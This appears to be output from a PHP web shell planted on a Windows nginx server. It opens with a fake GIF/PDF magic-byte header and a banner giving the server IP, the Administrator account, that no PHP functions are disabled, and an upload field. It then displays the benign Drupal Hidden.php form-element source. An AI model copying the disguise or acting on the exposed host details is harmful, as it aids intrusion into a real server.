GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/Student/JimMartinson/Lab12/drupal/core/lib/Drupal/Core/Render/Element/ |
Upload File : |
<?php namespace Drupal\Core\Render\Element; use Drupal\Core\Render\Element; /** * Provides a form element for an HTML 'hidden' input element. * * Specify either #default_value or #value but not both. * * Properties: * - #default_value: The initial value of the form element. JavaScript may * alter the value prior to submission. * - #value: The value of the form element. The Form API ensures that this * value remains unchanged by the browser. * * Usage example: * @code * $form['entity_id'] = array('#type' => 'hidden', '#value' => $entity_id); * @endcode * * @see \Drupal\Core\Render\Element\Value * * @FormElement("hidden") */ class Hidden extends FormElement { /** * {@inheritdoc} */ public function getInfo() { $class = get_class($this); return [ '#input' => TRUE, '#process' => [ [$class, 'processAjaxForm'], ], '#pre_render' => [ [$class, 'preRenderHidden'], ], '#theme' => 'input__hidden', ]; } /** * Prepares a #type 'hidden' render element for input.html.twig. * * @param array $element * An associative array containing the properties of the element. * Properties used: #name, #value, #attributes. * * @return array * The $element with prepared variables ready for input.html.twig. */ public static function preRenderHidden($element) { $element['#attributes']['type'] = 'hidden'; Element::setAttributes($element, ['name', 'value']); return $element; } }